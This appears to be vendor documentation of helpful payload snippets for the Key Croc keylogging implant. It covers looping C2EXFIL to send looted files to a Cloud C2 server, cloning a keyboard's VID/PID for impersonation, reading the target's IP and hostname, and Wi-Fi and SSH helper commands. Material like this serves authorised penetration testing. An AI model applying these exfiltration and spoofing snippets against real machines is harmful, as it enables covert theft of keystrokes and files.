Key Croc
Helpful Payload Snippets

EXFILTRATE MULTIPLE FILES USING C2EXFIL

The C2EXFIL tool, used to exfiltrate files to the configured Cloud C2 server, handles only one file at a time. A for loop can iterate over every matching file in a directory:

# Every .txt file in the loot directory becomes a separate C2EXFIL job.
# $FILES is deliberately left unquoted so the shell expands the glob.
FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING "$f" Example; done

ADD AN ATTACKMODE WITH THE CLONED VID AND PID VALUES

By default the Key Croc boots into Attack Mode and clones the VID and PID values of the connected human interface device (HID keyboard).
The VID and PID values are stored in the /tmp/vidpid file, as colon-separated hex values, and may be referenced in a payload using the following:

# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
# /tmp/vidpid holds "VVVV:PPPP" (vendor:product, hex, without the 0x prefix)
VENDOR=$(cut -d: -f1 /tmp/vidpid)
PRODUCT=$(cut -d: -f2 /tmp/vidpid)
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT

CHECKING CURRENT MODE (ATTACK OR ARMING)

If the Key Croc is in the Attack Mode, rather than Arming Mode, the /tmp/attackmode file will exist.
Checking the current ATTACKMODE
The Key Croc stores its current ATTACKMODE in the file /tmp/mode. In addition to the ATTACKMODE options such as HID or SERIAL, /tmp/mode records all additional parameters such as VID and PID. These values may be passed to a new ATTACKMODE command using bash command substitution: in this example, the output of "cat /tmp/mode" inside $() is substituted into the command line.

[email protected]:~# cat /tmp/mode
HID VID_0X04B3 PID_0X3025
[email protected]:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1

GETTING THE TARGET HOSTNAME AND IP ADDRESS

While the ECM_ETHERNET and RNDIS_ETHERNET options for ATTACKMODE display the target IP address and hostname interactively, these values may also be used in a payload. To store them in variables, run the following:

GET_VARS
# This exports the following variables:
$TARGET_IP
$TARGET_HOSTNAME
$HOST_IP
Alternatively, these target values may be obtained from the following:
# Each "lease <ip> {" line in the ISC DHCP lease file names a client address
TARGET_IP=$(grep ^lease /var/lib/dhcp/dhcpd.leases | awk '{ print $2 }' | sort | uniq)
# Last client-hostname entry, with leading whitespace, quotes and ";" stripped
TARGET_HOSTNAME=$(grep hostname /var/lib/dhcp/dhcpd.leases | awk '{ print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
And the host IP (the IP address of the Key Croc itself) can be determined with the following:
# The "address" line of the usb0 interface definition holds the Key Croc's own IP
HOST_IP=$(grep address /etc/network/interfaces.d/usb0 | awk '{ print $2 }')
However, unless changed from its default this value will be 172.16.64.1.
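The lease-file snippets above collect every address and hostname ever written, but dhcpd.leases is append-only, so the same client can appear several times and client-hostname is optional. The following added example (not from the Key Croc docs; the sample lease file and the last_lease function are constructed for illustration) parses the file block by block so that only the current lease is returned:

```shell
#!/bin/sh
# Added example, not from the Key Croc docs: pick the current lease from an
# ISC dhcpd.leases file. The file is append-only, so an address can appear
# many times and client-hostname is optional; the docs' grep/sort/uniq
# pipeline returns every address ever leased, while a block-by-block parse
# that keeps the last block returns only the current one.

# Constructed sample (two clients; a re-lease without a hostname, then with one).
SAMPLE_LEASES="$(mktemp)"
trap 'rm -f "$SAMPLE_LEASES"' EXIT
cat > "$SAMPLE_LEASES" <<'EOF'
lease 172.16.64.11 {
  starts 4 2023/05/04 09:00:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:66;
  client-hostname "oldhost";
}
lease 172.16.64.10 {
  starts 4 2023/05/04 10:00:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
}
lease 172.16.64.10 {
  starts 4 2023/05/04 10:30:00;
  binding state active;
  hardware ethernet 00:11:22:33:44:55;
  client-hostname "kali";
}
EOF

# last_lease FILE: prints "IP HOSTNAME" for the last complete lease block;
# HOSTNAME is "-" when that block has no client-hostname line.
last_lease() {
    awk '
        /^lease /         { ip = $2; host = "-" }                # block start: reset
        /client-hostname/ { host = $2; gsub(/[";]/, "", host) }  # drop quotes and ";"
        /^}/              { last_ip = ip; last_host = host }     # block end: remember
        END               { if (last_ip != "") print last_ip, last_host }
    ' "$1"
}

# The same variables the docs derive, from one pass over the file.
set -- $(last_lease "$SAMPLE_LEASES")
TARGET_IP="$1"; TARGET_HOSTNAME="$2"
echo "TARGET_IP = $TARGET_IP, TARGET_HOSTNAME = $TARGET_HOSTNAME"
```

On a device, point last_lease at /var/lib/dhcp/dhcpd.leases instead of the constructed sample.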

FRAMEWORK HELPERS

From firmware 1.3 onward, many Key Croc functions are exposed by sourcing croc_framework. The GET_HELPERS command lists them with a short description of each:

[email protected]:~/loot# GET_HELPERS
Available helper functions provided by sourcing croc_framework

MOUNT_UDISK
Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot

UNMOUNT_UDISK
Safely Unmounts udisk

UPDATE_LANGUAGES
Copy language files from udisk to the croc

ENABLE_INTERFACE
Enables wlan0

CLEAR_WIFI_CONFIG
Remove wpa_supplicant.conf to clear current wireless configuration

CONFIG_OPEN_WIFI
Generate a wpa_supplicant.conf for open wifi
Example: CONFIG_OPEN_WIFI 'attwifi'

CONFIG_PSK_WIFI
Generate a wpa_supplicant.conf for psk wifi
Example: CONFIG_PSK_WIFI 'attwifi' 'password'

START_WLAN_DHCP
Start dhcp on wlan0

ENABLE_WIFI
Enable wifi helper
configures wpa_supplicant, indicates using LED,
enables interface, starts wpa_supplicant and dhcp
Example psk: ENABLE_WIFI 'attwifi' 'password'
Example open: ENABLE_WIFI 'attwifi'

DISABLE_SSH
Disable SSH service

ENABLE_SSH
Enable SSH service